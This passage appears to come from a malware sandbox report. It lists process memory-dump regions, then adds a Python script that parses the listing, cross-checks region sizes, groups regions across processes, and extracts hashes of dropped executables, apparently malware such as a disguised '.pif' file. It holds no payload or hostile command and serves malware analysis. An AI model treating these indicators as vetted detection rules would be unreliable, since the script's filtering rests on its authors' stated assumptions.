• memory/1132-582-0x0000000006400000-0x0000000006708000-memory.dmp
  Filesize: 3.0MB
• memory/1132-127-0x0000000006B60000-0x0000000006FFC000-memory.dmp
  Filesize: 4.6MB
• memory/1356-241-0x0000000006540000-0x00000000069F4000-memory.dmp
  Filesize: 4.7MB
• memory/1608-1349-0x00000000003F0000-0x000000000047A000-memory.dmp
  Filesize: 552KB
• memory/1696-325-0x0000000001180000-0x0000000001488000-memory.dmp
  Filesize: 3.0MB
• memory/1960-310-0x0000000000130000-0x00000000005E4000-memory.dmp
  Filesize: 4.7MB
• memory/1960-309-0x0000000000130000-0x00000000005E4000-memory.dmp
  Filesize: 4.7MB
• memory/2072-302-0x0000000006570000-0x0000000006A24000-memory.dmp
  Filesize: 4.7MB
• memory/2072-308-0x0000000006570000-0x0000000006A24000-memory.dmp
  Filesize: 4.7MB
• memory/2480-185-0x0000000001170000-0x000000000160C000-memory.dmp
  Filesize: 4.6MB
• memory/2480-129-0x0000000001170000-0x000000000160C000-memory.dmp
  Filesize: 4.6MB
• memory/2480-128-0x0000000001170000-0x000000000160C000-memory.dmp
  Filesize: 4.6MB
• memory/2480-52-0x0000000001170000-0x000000000160C000-memory.dmp
  Filesize: 4.6MB
• memory/2616-158-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2616-156-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2616-152-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2616-161-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2616-160-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
  Filesize: 4KB
• memory/2616-154-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2616-150-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2616-163-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2620-29-0x0000000007450000-0x0000000007904000-memory.dmp
  Filesize: 4.7MB
• memory/2620-28-0x0000000000950000-0x0000000000E04000-memory.dmp
  Filesize: 4.7MB
• memory/2880-13-0x0000000006680000-0x0000000006B34000-memory.dmp
  Filesize: 4.7MB
• memory/2880-12-0x0000000006680000-0x0000000006B34000-memory.dmp
  Filesize: 4.7MB
• memory/2948-272-0x0000000018370000-0x0000000018816000-memory.dmp
  Filesize: 4.6MB
• memory/2948-196-0x0000000018370000-0x0000000018816000-memory.dmp
  Filesize: 4.6MB
• memory/2948-195-0x0000000018370000-0x0000000018816000-memory.dmp
  Filesize: 4.6MB
• memory/2960-231-0x000000001B4C0000-0x000000001B7A2000-memory.dmp
  Filesize: 2.9MB
• memory/2960-232-0x0000000002810000-0x0000000002818000-memory.dmp
  Filesize: 32KB
• memory/2992-182-0x00000000001D0000-0x000000000046C000-memory.dmp
  Filesize: 2.6MB
• memory/2992-180-0x00000000001D0000-0x000000000046C000-memory.dmp
  Filesize: 2.6MB
• memory/3004-80-0x0000000000400000-0x0000000000464000-memory.dmp
  Filesize: 400KB
• memory/3004-71-0x0000000000400000-0x0000000000464000-memory.dmp
  Filesize: 400KB
• memory/3004-82-0x0000000000400000-0x0000000000464000-memory.dmp
  Filesize: 400KB
• memory/3004-84-0x0000000000400000-0x0000000000464000-memory.dmp
  Filesize: 400KB
• memory/3004-81-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
  Filesize: 4KB
• memory/3004-73-0x0000000000400000-0x0000000000464000-memory.dmp
  Filesize: 400KB
• memory/3004-75-0x0000000000400000-0x0000000000464000-memory.dmp
  Filesize: 400KB
• memory/3004-77-0x0000000000400000-0x0000000000464000-memory.dmp
  Filesize: 400KB
• memory/3044-722-0x0000000000B80000-0x0000000001210000-memory.dmp
  Filesize: 6.6MB
• memory/3044-340-0x0000000061E00000-0x0000000061EF3000-memory.dmp
  Filesize: 972KB
• memory/3044-1031-0x0000000000B80000-0x0000000001210000-memory.dmp
  Filesize: 6.6MB
• memory/3328-870-0x0000000000AB0000-0x0000000000B6C000-memory.dmp
  Filesize: 752KB
• memory/3360-740-0x0000000000A60000-0x0000000000EB0000-memory.dmp
  Filesize: 4.3MB
• memory/3360-739-0x0000000000A60000-0x0000000000EB0000-memory.dmp
  Filesize: 4.3MB
• memory/4100-1371-0x0000000001340000-0x00000000013FC000-memory.dmp
  Filesize: 752KB
• memory/4100-1389-0x0000000000540000-0x0000000000566000-memory.dmp
  Filesize: 152KB
• memory/4528-1141-0x0000000000D10000-0x0000000000D9A000-memory.dmp
  Filesize: 552KB
• memory/4824-1043-0x0000000000400000-0x00000000004BC000-memory.dmp
  Filesize: 752KB
• memory/4824-1041-0x0000000000400000-0x00000000004BC000-memory.dmp
  Filesize: 752KB
• memory/4824-1039-0x0000000000400000-0x00000000004BC000-memory.dmp
  Filesize: 752KB
• memory/4824-1037-0x0000000000400000-0x00000000004BC000-memory.dmp
  Filesize: 752KB
• memory/4976-1073-0x0000000000510000-0x000000000051E000-memory.dmp
  Filesize: 56KB
• memory/4976-1063-0x0000000000B30000-0x0000000000BBA000-memory.dmp
  Filesize: 552KB
• memory/5068-1294-0x0000000000F70000-0x0000000000FD4000-memory.dmp
  Filesize: 400KB
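The dropped-file and memory-dump listing above is most useful when it is pulled into something checkable rather than read by eye. The script below is an added example, not tria.ge code, that parses this plain-text listing, verifies that each memory region's address range agrees with the Filesize the report prints, groups regions by byte size so that one image mapped into several processes stands out (on the full listing the 0x4B4000-byte region appears in pids 352, 1132, 1356, 1960, 2072, 2620 and 2880), and collects SHA256 values for the dropped executables. It assumes the report layout shown here (a bullet per entry, then key/value pairs either on separate lines or as `Key: value`), and it skips files under the Firefox profile on the assumption, ours rather than the report's, that widevinecdm.dll, prefs-1.js and recovery.jsonlz4 are the browser's own writes and not malware drops. The embedded sample is a constructed excerpt of the page's own entries.

```python
"""Turn a tria.ge 'dropped files' / 'memory dump' listing into checkable IOCs.

Added example, not tria.ge code. It reads the report's plain-text form: every
entry starts with a bullet, followed by Filesize/MD5/SHA1/SHA256/SHA512 pairs,
written either as a key and its value on separate lines or as "Key: value".
"""
import re
from collections import defaultdict

MEM_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
KV_RE = re.compile(r"\b(Filesize|MD5|SHA1|SHA256|SHA512)\b:?\s*(\S+)")

# Constructed excerpt of the listing above (hashes as printed on the page),
# in both layouts the parser accepts.
SAMPLE = r"""
• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
  Filesize
  372B
  MD5
  8be33af717bb1b67fbd61c3f4b807e9e
  SHA256
  e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
• C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe
  Filesize: 526KB
  SHA256: ac0655d5bccf2669297a08564c1c98f428bbda7e5a4d7bb5215fef06b23e9881
• \Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
  Filesize: 1.3MB
  SHA256: 9d61713812b8af616f33f88f5fb8ba98bbdef9ab5e33229d402a4ba4e6974e97
• memory/352-243-0x00000000008D0000-0x0000000000D84000-memory.dmp
  Filesize: 4.7MB
• memory/1132-187-0x0000000000A20000-0x0000000000ED4000-memory.dmp
  Filesize: 4.7MB
• memory/2616-158-0x0000000000400000-0x0000000000463000-memory.dmp
  Filesize: 396KB
• memory/2616-160-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
  Filesize: 4KB
"""


def human_size(n: int) -> str:
    """Render a byte count the way the report prints it (4.7MB, 396KB, 372B)."""
    if n >= 1 << 20:
        return f"{n / (1 << 20):.1f}MB"
    if n >= 1024:
        return f"{n // 1024}KB"
    return f"{n}B"


def parse_entries(text: str) -> list:
    """Split the listing into dicts; memory entries also get pid/start/end/size."""
    entries = []
    for chunk in text.split("•")[1:]:
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        entry = {"name": lines[0], "kind": "file"}
        for key, val in KV_RE.findall(" ".join(lines[1:])):
            entry[key] = val
        m = MEM_RE.match(entry["name"])
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            entry.update(kind="memory", pid=int(m["pid"]),
                         start=start, end=end, size=end - start)
        entries.append(entry)
    return entries


def size_mismatches(entries) -> list:
    """Memory regions whose address range disagrees with the stated Filesize."""
    return [e["name"] for e in entries
            if e["kind"] == "memory" and "Filesize" in e
            and human_size(e["size"]) != e["Filesize"]]


def regions_by_size(entries) -> dict:
    """Map region byte size -> sorted PIDs it appears in, so the same image
    mapped into several processes is visible at a glance."""
    groups = defaultdict(set)
    for e in entries:
        if e["kind"] == "memory":
            groups[e["size"]].add(e["pid"])
    return {size: sorted(pids) for size, pids in groups.items()}


def dropped_executables(entries) -> dict:
    """SHA256 per dropped file with an executable extension. Files under a
    Firefox profile are skipped on the assumption (ours, not the report's)
    that they are the browser's own writes rather than malware drops."""
    out = {}
    for e in entries:
        if e["kind"] != "file" or "\\Mozilla\\Firefox\\Profiles\\" in e["name"]:
            continue
        if e["name"].lower().endswith((".exe", ".pif", ".dll")):
            out[e["name"]] = e.get("SHA256")
    return out


if __name__ == "__main__":
    found = parse_entries(SAMPLE)
    print("mismatched regions:", size_mismatches(found))
    for size, pids in sorted(regions_by_size(found).items(), reverse=True):
        print(f"{human_size(size):>7} ({size:#x}) in pids {pids}")
    for name, sha in dropped_executables(found).items():
        print(sha, name)
```

Feed it the whole listing instead of SAMPLE and `regions_by_size` becomes the pivot: identical region sizes at different base addresses in unrelated PIDs are worth dumping and comparing, while `size_mismatches` catches a copy-paste or extraction error in a range before it ends up in a detection rule.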